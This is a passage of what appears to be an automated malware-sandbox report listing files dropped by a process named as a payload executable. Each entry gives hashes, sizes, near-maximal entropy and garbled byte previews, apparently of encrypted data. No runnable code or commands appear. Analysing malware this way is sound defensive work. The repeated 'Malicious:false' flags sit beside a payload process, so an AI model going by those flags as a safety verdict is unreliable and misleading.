                                                                                                SHA-512:685E71CB89CFD0838A478F9C7E1342B7FFB7FD8F6E770CC9A55793765FB83AF0C50ECF5F1533E869F6297923DE218CF81C65455636F7C2D75F2F9ED5F44E10D4
                                                                                                Malicious:false
                                                                                                Preview:<?xml......O9L%Z....+.P...B.8b..?.|..6Z..W..:1+..#..4..i.:.sU_..K(S...6...p),.......}.....*...6...n.......@.E.....k......@.A....UZ.1L..\.~..SaA.(=*..7.O.r.^.w?_Q(...i....N...h9.a "...5y7Z.=Y..oi.;.d.\rG.^q....U.....c..\......$G....Mb.?.V.2......k..x..%..%...........o.?....=.=xU=..,....%1r..mo...!....|ll.....#.....%.|U..K........m.@..'..1.Uk..kV)t.X....k9...bG....HkI..c.^...e.>.J9D.;d$".}...s..4........*$.+..@.k;G.c..B.G..| .......|B....d3.....:...O..y......w(.Q%.......+....z.e'*.&...b.........i.V-.. K.=^..[...J.=.=.Y....6.<'.[..h... vN..K&..~c/.@...L1......$.|$,=.......H.u.w.v....[...u....S...9.v..7..jl...i.$..4...;BiP%Y..c.....e....z...U.....ud.)...ay.6.v..9...rVkN..w...X..A_...d.Q%.L.d.oT.....0`%.f3L.2.$..7....|.C#.~..!.@..x.@_...T......i....`T..,*{n..#..3.3...{u.t [...-....}O..{pQ....q...9.*5.a......C.lT.Dt..X..uC..E..6.........$...t.s.N...UZ..c........;.b..2..5......h.~0.....1...`Q.`..H]$....|....g..#:.V..Vz.D. `.g.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3132
                                                                                                Entropy (8bit):7.92847942390232
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:m5fROl32ne+U8JGRxrkMkrP8GfUfkP1CbuUxdTRNnrtPTe:SfUJ2hU8JGfraEGMfktcuU/R/e
                                                                                                MD5:37865D181130AAE569BD1F9DBBE48703
                                                                                                SHA1:246657D73D38461E06CF0DBB2DF5D3A0EF2CFB28
                                                                                                SHA-256:DED8368334684829942124CB67FBD7CE3EFECB36252EE1A57D72E8A625377B37
                                                                                                SHA-512:8AB1A264132FCF290D4698C90D5170535892C5ADEB3566A930320A2D42D695396D996E56F0408D081B4A61F795448AEE8A3EC53CE14CD63D4392A42CEA349303
                                                                                                Malicious:false
                                                                                                Preview:<?xml...o...../..7.^.@{PU...0#(...#..l....v...C....9...~;X.........?t.o..}Y.:..(!T....I....m..%(..._.7H..2GvOYe...!./$...;.R...^&..>o..`.0}J..\C.%..'..8.b.r...3..G.L.............Z^|.......j.........f.cx".Z.......7...P.}}..K.CH....v...@.N<.U}E.........q.7H..,..99"..F<.psL.....h..a...r$..i)....-.V..0......9m@.`Q..#...P..7:/....>SHf7XP...6.d.....~ .......r..]...k...$.l?VPB.w....j...:..F...[q......d>`o.=g..Du1.S'X..H...1..'......%>L0........n.....rl...u.....-...qT....C....u..*KP3..F{..,.7..R.......1.&.A7D.._sOb.........aFj.q..sla.>..X..G.`...r..#..'.W.:21Q.|..$....K..)..!.e8.q...Aq.!...]C@.....-......2.^a4.e.*..)...`pAH....;....;..._dk...:.W.G...^.2.I.>rBS.Y.".`.o..K....2...b57z".#....5 .I...U.b.2.B...Wa{.=..B..........u..h.RC...W...T......s.u...i. .lER\.7..C..`..3.P..U....~..Z`.........75Y/j.w.^#.'.jfPC..?|. ..\...rb..Q}'.>.9m.q..p......r0#.v.^I.L..M).~.8..*%.2.*U)L.L.....1.v.U.o..9...8.Z.O$..V.!g)>....&V..;.PrL0S..9.UC"D.q.?jE.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4968
                                                                                                Entropy (8bit):7.9610647991574774
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:Aqu8BXJGU9tPnLXs39w9q704qzpdlptsjkV6QZpGujySRG/:NB5GU9tPdn4qdlp2Yckf5Q
                                                                                                MD5:34D8286A673DC5A0E17AD8F976E5EE28
                                                                                                SHA1:A571CBA535A1F3FC5E19D489DC77458E64B40F22
                                                                                                SHA-256:6D2F93E2DC59DA274F6EE037938339DBC47C62F00BA26E235F14C43F8DBCB9AD
                                                                                                SHA-512:DDEFB971BF8268F7320251F12554A2494AEF04F65F7AF18D925303BA1CC04066EEEF5C4BBDD66097E0B2BA8E2A2CFFD38ECAFB4C6644E20AA2C57D9D538C2710
                                                                                                Malicious:false
                                                                                                Preview:<?xml_..!.....1....c....N.6M....Lu....\6..8| .r...........Z.Y"&.08t.e.....D. :Hp.W}........U...g.-Y_.....-B......xy...y/......}.X...ZkH./..\(,h^.6..7I..<%Y... .|%.....p...J....e.N.\.t9..V.E....{...O.ck|...` ...%^........#.....mfv.`....=.d..n).>....!.Zit.c6Sx.b..{.uu.h....i}26...?t.|M;...*..F.]c.!#.O.u.....m.....W.p-^~..a..v.oIYj...2.{..rE...h..)......P.._tNW.(#h%}A...-.....$T+........1...W.#..XC.^....c9.4.b#&_".z.,BZ3...H2..w%[LP.q_...jO#v.......hW....?7.C.9.c....(-....*9.=).n..+?.VF..7.6....i.w.&.f.F...Q..T.*e..y.Z.UC..H.f/m...:..HvJ').pM.1..!.o..1cCx.y..j.s.........7...u<K@....s.wF9......lzP.I.!i_c.)..q.9...J..3(....O.wz...;..8....7.Fc`...\U^7....$..MQ....J.DE...#l...P'.....:Z......V..#......A..8=..41..$8.....v-%.L...... .:.4.w...;Dw..7.XIx....kl0.u...0.Q.5-...r....L.T+....,...CE.!....DQ.br....Kbb....L......s..M..w..aW....&..t.9&..m.'.<..$3.Y..T\.Q..qP..<"...b,..E@_=.[_...$.Ln\.:4....2...DV.T.s:..D...T|S."..f.+.d"'....B.3.d.A|.T.I..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7596
                                                                                                Entropy (8bit):7.976628920706582
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:hPYt+0J+Hq6qJ7u65frMkAqaOy5fu73o+AVlvD:WtT1JMl9Ru7/AV9
                                                                                                MD5:27AC7D33FFEFCC6E67F0BAD54E46F369
                                                                                                SHA1:824C0BD1FF3F0E52F8987BF4816B78FF36B6210F
                                                                                                SHA-256:860957D11A0A4414B25C054057C4DE0A6413D02E4F226FFDB6775362209D8DCC
                                                                                                SHA-512:5B8A6557D3F8BDC3DDDDE52D9B928FE55B59327310B269AAB4F82058D0EDBD0F1947F7A9AC7E96500A25BB346C14CD9DE0D418EEFE2232020B992BA7EEADE649
                                                                                                Malicious:false
                                                                                                Preview:<?xmla.i.?...N|I.[=e....\..N-o.....>.;...if.=..d..[..b.>...}..D_..t)T........'... .TLd.!.t+Ow...h...U,..u....}..B.|3........9.F............ m.N.....N..............{.`......R-..<.Xm9...I.n.I.j/...k.%>.Dp..7..8......".q;.A.()..TK8..k....y..2.......~2...G..,..5B&.m.z.6......m.u.F.k.O.l+...X.e...D.g....tS7=.@.a..EP...U.......Pk.....~....?.,V..O..|d..P...~....5GR.{.s?...&d._!X..P.1\......&n=sO/.......P.&ZR..6.9....5....".H.@x^..Q-Q.a....)......7|..@....2;.Y.v......2...qG8..=.h...c..+.A$..%I/@...>;L...].n.1.6....,@{r.^....[.K...l...aqw..h....G..P.(..........>.-.kE....k... {4.RV..k.a......yg.f...6....^-h..v...Z......T.MGl&.hE.%...-FS_.I.....RN5.Q&.6g.f......#........#_........5g...+...f7...G.zh......b...+......Y.w.T..~ -=(...YVS.."..w...-a.......0..X.j..$$...~N{.....$u,9!1I..C......G7.V..-.\^%.,Z.?..g.9...5]O=..L.vv........VC....nF..8!....PK....u..g:.....s$..o..."....-..-b~@..M..f...bJ.z....'.,.%...b7Y.....#h.<*.....8...Y.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7356
                                                                                                Entropy (8bit):7.975432306865527
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xifa0tS3H2RX5wMoVB+FVNy6PV6RXMFu5lAh:x27wBtfc3V6RiUI
                                                                                                MD5:2EF33455074E785AC6D83F504BC75676
                                                                                                SHA1:DD32D500A608EC4FD4ED554C47F03D0D32D83F9F
                                                                                                SHA-256:6FC17B10F79B325468960A830432C365EDBE5183570BF6663121C664239B51D8
                                                                                                SHA-512:CF900E21AA1ED9E7348A812A9ECCB635DEEE5281C4086285D7C38D3D2B91E54B61E0EB74253A413CDAA81027D23572C507D4DD8DBBE0F2AC704B5B1F755B44CD
                                                                                                Malicious:false
                                                                                                Preview:<?xml.W....+..<...Z.6E...1aTo..P..i7Ye..}..C..'.....(.eEH...VM.Je.)^J.AG1f.....S...c.#...L....._.qg../...A5....?....r....D..\i..A..R.;|.R.... d...(~Z.....;...7..%[,.0..7...>....ZN[.S[G.. ....,.O(.......J....m=.}\..w2=...t...F....;M.s.:......H..[.....7.o..9...........C.R.....?..{.@L]..0............r..|T....z...Sf}.b.=..{L..(b..8+dGb'.=.Y...|%.^-....x..u1....[...%....."....kB.Wx"*....l..l.9p.*Vy...v..B._?I...%.4....:.G.Y....k.gnk...*s...|*j.1....'...2Gc.=...B....R..?0Bm...97h.........i...6.`.8.lxWX..qX.A..x. .'n/..s..T...7...L.E..C...S.H.h......I..i..?.Z.K........c........+.n.6n....`.G.U.$...:.q...P8......f.....H.K)-.?U.a.V..b.t...QB[B.!..P,b..W...t..S..+..%p..._.'%-...U0..k...Vv....K..B6..SJ......YTrN..1....0B...3.T...L.>......PY...!.[.v..C.....0A..k.........!H.`...*....S=SO..|zq_..:..D........m.S......Q.~.1%.:......W.#`..sa.....S..t..kOB......lC..l..R5..3....../..4.&......`6.U.......$.e "..QA.......e....d{...^.Z.sG......,5Fq.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1551
                                                                                                Entropy (8bit):7.8531062957081135
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:WcwvL1GxJZIMyGt0VBwegKeGZSyt4BBFKLD:gTCZNyGt0VB7gjG8yt4c
                                                                                                MD5:A722BB52639605FD0ED2C69566B94C43
                                                                                                SHA1:AAC3AB03FB8CFB033F5359EB27511742DD2D2B89
                                                                                                SHA-256:9FA901C90590059C4C1AE75E685A37598B01260F9F9123A07467EB1D1E8EA990
                                                                                                SHA-512:2829F8C266B147BCAB29568DE6AC844A4155176729022814A7E7243233E47B794164AB1E8D2D89DA224C67786D4DFBB8242027F319149B341C745220539560A8
                                                                                                Malicious:false
                                                                                                Preview:<?xml..R).<H.,.\...q.b..).vX..D..(...O'b4l]w.k.._U.S.7..<kn....+Lzy.S.I..h...H..s.:t...|....>.5..S.9..!P.X.G.UE@....+....&.=%a|+.j..u;....ND\.5V....P...Ne;24C8.v2-...(...[v...Y...D8.V.>r.E....A.N....UMc..%.......d......H.UGQ-.'..V....0qh)+.g\p^\.....G..f..K.9.)H..zq..cY.d{..G.#.....m..1...O...i..*\..TZ...../......Q7l/....M._.u.n.$...l}J........BE.%r..4.R..QI.XX.&.Q.j%........Y.eH.....x1.1.t.w....v.a..<a.<fT.)..U%Ti<;..r...uA9..4N..[S7x....cC....NU:...F\.14...H=...4:.N...Tx..C........q.z..Y.b..l......P.0.BF$.u.M.4...U..|C..@W[!|...Bj.y.H.A....;;z....t....K-..g!6...\%.'..f...l.h.h.....MF.Cj.B;baZk...M{...k&;..n.. ..;jOz.5.2y.o..;4U*.....:.f...`>N.q.BGS....E...b.eJ...fjk...........R ...=.kF?.TPm./..../B..Km..]...>5..e...a'...b..Tt.g..o.OUl.`..,r..(.Ay2.U.9r..j.me4.,.+.....M{\..CS..... Z.{..F2.+b;.sL?....&.....7...deU.....6.....N#...<p.a.j..I..i..`!y..`...(.....l..f...0.E.j4|...m.9P..!f{.d%bl.....I>...("_.PEw|..m..f..h..E7..s,.z.'....y...1...s..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1716
                                                                                                Entropy (8bit):7.8689871074181035
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Ek8aLs4Pwe3TGa2FqgSh1KhBXeMXvkJkk2pkreW6YUtMOif5Te4Tf+qIzwBO3hxn:E99e36apK7XhqPtUSxtIzwBO37LD
                                                                                                MD5:BD469647AFB0BF1409C3B9844C038E8C
                                                                                                SHA1:12844B6E2A82B669BD8F9F7428549084B793A87A
                                                                                                SHA-256:E4515B746DC570D53120F468D43382E26D160AEC02EC56E867B34D7B6F1EC937
                                                                                                SHA-512:BDF03E47D691D4FBD95FDCD258552394490BD5E7CCCD041B620C09C1D992C45F03871D1797997A30D74E02F7D272E44793098F37D8831D363EAA4D8ED12908E9
                                                                                                Malicious:false
                                                                                                Preview:<?xml.]......79..D9k+..)Zg....X.q2vn.....4#iY9..'.....1m.vP..(....]...w...^]uK.....H..R....$...HKLQ.p.......)@..5.>:.[.v07{..-S.C.d.4.j.cn.:WFD..7+'".:....PR.j4p...Nj.....r.5H...v...h..9.7..<M...h...H2..C...1...\..@0Yc..C.t&2...a..o..F.|p. ...E..17rP.B.4$F...A.]_...`...[7...'.'`.YZ=...ij.N..x.k.K.3......^Bh.U.........;c..,....'.i{y../..?..R.LBh......PX..X..~.......u.../m....X|...i....&...p..\".;.r....3......#.^..uH..`..........7.+.'..).o'...V..W-.T......e.....L.p.].|.Xy2.......3OC.g..)......*9.:.@.u..y..[.E..;.]N.F(..Tp...)...C...;.]*.z.N-l.......a>.v.[......K..c.Y.E.O..w.c^....h.....q...u.....i...?.?...!.Y.5B..R9r...4.}.uZ..j.Ul.J...S....k$....|:y..C....2.8.h....d.S*.y.g...X.'....-v.)..m...3n(.....i.<..mm...4......<..QEu...8g'....X..(..9.N.....):..E.'....._.sXD.l.1....7.....D....j.\...kM..."..[.+.u.O[/...l.....\|.....>N.].N.....i.<..*...o....^&w...J..X*.p.[{.hR.(1.....#.b.n..Z.b....%.M...?.4.1`B....mi'8O..-{1....C.....J...&..F..T.cEn.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1737
                                                                                                Entropy (8bit):7.89318243378625
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:KxNt7A/QYatCLYuuLlPIf1Vv8pj6FPq8CYdLPf+arW32tPqcc8f/tcGfK0/NJqj6:MzAIRBqVvXiEdLPf+pVNI/2Ge0LLD
                                                                                                MD5:7D0ABA0BC0597645FA3BD01D2C186D92
                                                                                                SHA1:D12CB9612FEB0322594B4411BB20722E86E9D45B
                                                                                                SHA-256:C2648DF79C269D6B7489D6256EDC88665DC224964D6E0818AF792C12D8EE94B1
                                                                                                SHA-512:FA26E1BA5D305D633E6858BFBF2EC70D5839A315AEBCDFCE748426E2C47A7109F0F3A80930D75132A158CB0A53F71AFD7B3A02892A8724ABA74A68CE735DDEDD
                                                                                                Malicious:false
                                                                                                Preview:<?xml0...5....I..Q...v..V..[s....k..j......Y\'....N....8.@..Qz..).%V.^@......).Y.S.'......0,.\MX..$.a./K6....5.3s8.".....o_.V.j|_..{.v.HX.#m.....9S..H.:.j..m...`..F.... >.......Q...&G.'k..........<...g...T..........e"....@D.D./..$...OPA*o]2..N.W..%.jK.:qU.6...A....)....M...p..)..L].\&..A.......N...0D.I..Z.....}.}:..U..'rO:S..]..![...$#....]IU.b?.........hx...D|o5..!...\.....I*H...3../..59......H#..@G..UO.Z.>Z.I..}.K#O..t..V..=.]..;.J.T.E.?.C.....g.C.Z..Nf....t...}..7R......O...?.7....^..8..S....Y.e:.}.y...z.6..rb.............F@|R.n.....9..X..R....o.>u..Tg.#.....Bd.Z.......L.c...2...".&.Y,...<.@......lb.Yds....m.B....[..]...$..;n3..Zg.+..Y......#...f......\.1......"nk..Gxo(WCx....]Fy^}I%...{Xv..M.*.?u.7c.~..3../.)K.d.....d.a.G.......l.\...{S.j.`J...7P,&LK..........+I|R.`.k.d.0..2^.Y.).*6.,..Zf...!.'L..'%.D..;}.vWg.S-p.n.S...........f/......tYZ.&'b.w.%!..1N~...e.....2..bb..[.0...o....?...0.m?GY.w....[s.k.....N.(.....6a9m;.l-..X...z..._%b.......%..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1448
                                                                                                Entropy (8bit):7.86523014596275
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:IZRO6PyfnXyTAE2/CsSBJp5YwmtHyfdfWgdU/O4/ZQjnKuPJv45WlbTqlx3bD:IZRVPy/XyTAE2/C7p+PufWXW4hInKuPG
                                                                                                MD5:A461CD4FF6313FAE05EB8C11FA9EC210
                                                                                                SHA1:27665BA700BF7D56A3DEA416F05A92383A66911F
                                                                                                SHA-256:2E1C15023BB2C11442454F1DBD760C5321D1D14B8E543FDABAFA6F735DDF1E6A
                                                                                                SHA-512:874FC646E6C122DEB6B43081B4C833AADA36B5A286C1AB9E4B4789092279646281FD48106943AF9676CDC14E2F0FFA2AFEE67A651C36F5F9E44638655D9E2FCF
                                                                                                Malicious:false
                                                                                                Preview:<?xmlg.RFM..P.hS.?..Nb.....jE.....z..\X{h..C.4.....p-n.$..c.}me..^........H...~f,.F_.~....6..94N......g..b...&......DLx23.&.8Fx.<..."=.;;..l.s...q.......H./s.n...(!....K.).\..x.....9~,..d..s..R.TzF...m.K.....74C.L.....(..fX.._.V.a.U...5..bS.F......%.r..~V9....._......W.-..../...........Szt.a....DN?.Xi...M.C_..NNw.._m....#.`.z.5.>J..j.$.~.#....U.......Ce.P...=..C..@f.H.....G......-=E/c`_.2....1..W........!..Q,......R:...?.x.-....YVH#..Z........!?.~......ki.0......^....rEp...Z.....".P.......@.Y..Z...K./_.......[.t...9.nF%.O....B.w.9.Y-.?.FY.n..?iB..W...[..<.L.......Y'_........H.(d..RQA.W.......A...........2.=.....9g......I.#.#..C.....^. .x..{....1.....jp.......Z^..j......w.gE.H:..C.SF....h1..?;...o.1.......}.........#+.k.znL..v.(=7".........3.m.0....C]...|.C...kP?..R.[x.......J..'.'....k..K..6.I.....*.l.qIU...V.#..Q...Z..KO.O|9...f.cr4.<.......rt..2.....%.....T.P@S.}B..0....z.d.d.UL.[.Ge.j.z.1.....Yp:.l.{...dSp..6K..!..lT
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1419
                                                                                                Entropy (8bit):7.8738132413740685
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wVs5jfXQC5Dk7WGx9u2WTN+gE0InNtAI2KfiN4uZVOiz8KKFzQhnRATP9KBLSx3X:wVmjfXQC5Dk3xw2IN3EfMKf74VOfKkYK
                                                                                                MD5:7328F85E289B148B6E5F186A3783E65D
                                                                                                SHA1:E81D3C0A119DC41F7A570B0D3FDC56D4D56D73E3
                                                                                                SHA-256:6EC8A003450AB73EC447073250075102D5CAE2EDACC57EE6424F6845AC7389AF
                                                                                                SHA-512:9FB446A8EBC60D648ECDB0AD6330913C5E0FC9DC7BE7EEB82648A2391703CBEA482AC31A3A95F69B1CA0C5CC5DACF192662427D7BAF11A63AFF03C1B9A881AA1
                                                                                                Malicious:false
                                                                                                Preview:<?xmlM...N.L...{...=fA..-X....W......b-......w..4 .5..X...*..K..!@....8..[3.....UV.Z...u..SQ...RK....2.(..$..@.i.....F.h..L)\XgF.3......-..`x/..%Q... ..H...;.[..."...... U;...B.U...L....28.M.....=...3.<d.`QN..n...X...w.7.... ..........I...^..v.c>+...}..7z:-..`q..,.w....J.[F..:B.f....a..._.f'..m&.......].q.y..5...../..../.........(...S..c.M@....JX.CZ....{..[.W<Y...........Mw.W.RkA.Qj.?.q.)P5A.W.`.q.)6.f....e...H.A..w...%\.2D.k.,.k.g5.g\....f...n..!....v.../|.2.5^J./9......v...S:..3...O..............p7.0......1..:!..U..0..(8..k.=/Z.l.4t.....o./q.S..S.......W:2KHc...l.5.r....:..X..+..:!?.1.:@;:.OYB..nn.......fq..2p.J...f.....O'Y....'t.Gd........h..ku.B...Ku.oI.%y...A.X........Y.{.^..3Z.].S..r.t7.<.Y..db....!.bqt_V......T.O.........Ij..#bj*^$..z...X.....t.w.^...........by.:C.......Y..!......aMb...O.OP*>.<..1|fl.}........y.....?&...6..x......7..<........g.53.O..m..X...'.1...."J.q..#......@5V..R.$S. ....<.1..QC.QK\...P..%..E..xq..@.KM......}q5
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1546
                                                                                                Entropy (8bit):7.877748062203308
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QPS+V1XjDvwj6/eEZaaQ2nq84ASKmGVe6PBDHzpyFqtrtDprzNO7eKhw+Y5ik3Vq:KS+7z8ULNq84VIDVychOes8kLD
                                                                                                MD5:413A88CF6082E29264FDEBC9A2A21851
                                                                                                SHA1:3F0C71F8E62D04CCA6C0903325285E5B32A560C2
                                                                                                SHA-256:57F73F5B6C4B390F24B9B7E4E15852441A527C7E17775A5C511A5D1CC9BC7C9D
                                                                                                SHA-512:6CF826F43E7B092709D40237031BD0BE2B4AC9851DE048A29528EE1F1A94F3CD29D78B6CB48484544FBA929112CCEDD693B6A6E981B67161FADC59811C0DF3B9
                                                                                                Malicious:false
                                                                                                Preview:<?xmlO..-+0...UT...}......5.K.OT..w..\.t..Q.:u.oL......K'.k....VD.[.b.f#:.Aw3......e.s.Ja.u)......a1;{..5.T{?*(.^..\...5.!....U.,cA..y...o<...s4_.\..kTo...JpC.3[C..z...8.p`......_.Z....e...;.N..gc.D.jh.,.]..>..#....Z.Y...W...v.....I..,...Br..=u.}....W3&H........Y.Q...y..j._.)$.Vw..S.&n..Dr4.NR.d.m.|.y.".JT...:...-`..a.d.h.A8.9..*.{..m..`.V...<.;>L.[ ,.$........1U.rF{/.V...".F.C......'....L..qX*...,......X......-...~k.3.s=.....?....!r..<.. =T.f..-...q.=.jh.}......Y..G<h.OY...$..JO.F......3{..5..,..j.u.2]r.J&./...G..gR.+Qg..7Fb..E.z."..Z.0F.).p...~.q.u....... 2+l:3.#......r._....._s.\X.H*..!.....15.F{...#.f...P3..../..,..Q.0.+5.L..QU....rx..$1....8{:.U.w7b.q?.P...lz.........O.g._....s...Xl)q.f-..%...2...l...X...Y.+......)Rd....+.&..x..W_E.M.f.{....9.3.....X^..k..O..zN..x....Q2.v'.q....!.n..5B.z.....Z..t4T...r.dh..0....V....D..).6..[.c.:%.1-5....z.|j..:..1.E.Z]..........:.~W.....z.g..W.L..L.....(<......C%!.....jR.S....w8I...|%..v>...:`:....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):903
                                                                                                Entropy (8bit):7.758802942151345
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:00+NDHgKGNy2eyx25/IqHmfRDEAs2q8Iz8o79nDEdSx3bD:00OHNYehIqGfd1M8G79nDEdmLD
                                                                                                MD5:478150C0D4BF6645C6E49FADCA6C78D2
                                                                                                SHA1:5C61D78F85A1DCEA98F8A83B377CEA6184B6E8E7
                                                                                                SHA-256:8B766E2428032397A48EB4E4287FF604FCD0387C7131C6127EE7011861FFD8B6
                                                                                                SHA-512:D7DA50820BA1CE1F00883A90FD76E24DCA6C9E990613525153F3D13D5293E61B06B83F2CA61F7222EA45589ACB8E84FFAFD1A03F4AC4B6839AC7DEF2F0403CC8
                                                                                                Malicious:false
                                                                                                Preview:<?xml..g)*.g.x....=......9..\.!V..s....R....G.K...M....l......F..h........!...H..z2.._.3..4.,....Q.m;.?..I...H......6..r...G.....tZ..j69'.A..@.?.......Aa.q..hTl..Q.EtY.K..@`..x/..E......G.k.<.jl..Ek..u... ... ...5i|:....P.z.u....w#...$......"..#j...?........P...%.6.......:."..x[.P....Q..?.+.r.#.{.Wd...P......E..(L..@j.L..@I..B=..RA./.Z.=.k"......ErT...Q)}.<..d...(#u..L ..I.?...2....,......!......=..;].....&.o.....1...8._.(.d_2.X....;..;..C........_.D...`...2{7...Z ...}.{v..~.5.7.i.z.TR.m.....Xj.._...........?.Rt..b6...G.8vLF94x,...3y..).0c..~.6m...{.l....X..nU.v..tZ..gzV{....j/....R{5.........'yq. ..Y~.;...w,.b..$W.-.?.Y.....6....RO...Du........Q'.I..F..L...^\_{.!..D.!.T.=.,....%.x.b...7.rx ,.xP.H.>..'o.5./`.v..K. ...ov..N..(.u....m.....l..c.D........M....K...8iv.`..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3566
                                                                                                Entropy (8bit):7.951734971742599
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:rTqGPPSZCRnTYmZA2l6Sadu2HFTyhSjRu:rTqGPVlEmZvl6SadDHAZ
                                                                                                MD5:22F64490D41519CAB0D8D9C25774E52D
                                                                                                SHA1:93C0C4E1C6471617698D218C4F9C76998D89B746
                                                                                                SHA-256:3EA6908F4C49CA4CE0D956E41CAFA8CFE7DDE6EEB88687B5712D708B798D4915
                                                                                                SHA-512:4FEDAC369920355BA72FB860FB35759ED0B4A6E7364320299700A84332F19171E35AF0818E489BD2D09AC6698DA88E8894EE8B47EE3ECB4255EAF262C92CBA1E
                                                                                                Malicious:false
                                                                                                Preview:<?xml....2O..-......Y7.X..6.r<Jm..,..t.[...%6.u.}.u.C......H{....D.....d..c.p.eK.7_.~W@..V.y.n..6..3+A.K...T.^|..L.[.[....l;.....q=y.w.~ H.;..cd.2...5.. YB.e<wSTP.l..?n..U.=...~...@..K.{W...R.f.|....sHC1..O|.".l...h.x~<..U..Z....4...Xg.W.C.....z.Q........8.|y*..u\.K.2.4z.?7...>zj.J.YK.......E...Q.G......?......A.}b....F..'.jw.O..#...:..)%....%1...s.m.TU?.}..1(.C+~.q..*.o..U.).0.TO....hd.j.E....9V..z...9:..w.....[.U.p.v;.#4...._..j..4.wh..Gn|...JQu.a..AAk'O.,G."...{G...o..R.@t.t......9@G...{..a.<b8....1./.#..S31.p...b..?x.Er..v.;...!.sa.[.9 [....T.P.Q.5...y.WT...j.f.G...RO._.m.......p.{.":!...].*.[.\..aX..gM..K..'..K).ol[...!.......)..-.."!.4.....qQ......X....!........*....]..}.8.P3....~).v|Wy.H.w.g.{..KM..5VF.nl...iz...kZ..+.~.|...>yz...A*WCH...?}..........P..5....r.._.Nl.J.x..=.34.}].......:1[...B{{`u..e.?=C.i.._p..l......u.!r.3.........g9X.{..AQ..Hv..sL....R.2F......3.[......;._....`....A./^....H.b..g... .[~.o......j.ZV.]C..#.v.....5...B
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3677
                                                                                                Entropy (8bit):7.9498679481459575
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:MhLOr9r2AXJTFvULGGohnP30unYISKUEV76iZUig:MdOBpJTjZhnP0uY8zVFU5
                                                                                                MD5:F34B990C23B7F5D89E1E3BDBA951A729
                                                                                                SHA1:EBC7D4AC5F476FFED3CA7D07334CABB0048D081D
                                                                                                SHA-256:F0B9168F95F6838247E8DF0E68A52A5A3D11ED64B1B163685F789E9DF0B9C161
                                                                                                SHA-512:A2DFACB8B9598113E0304DC92A18403A81D034CADDE7A95E98357992F774DC32EB5592FD35F5B1B87F05CEF30B01860481A7B22AB82ED1B4DC2EB377FBD82FBA
                                                                                                Malicious:false
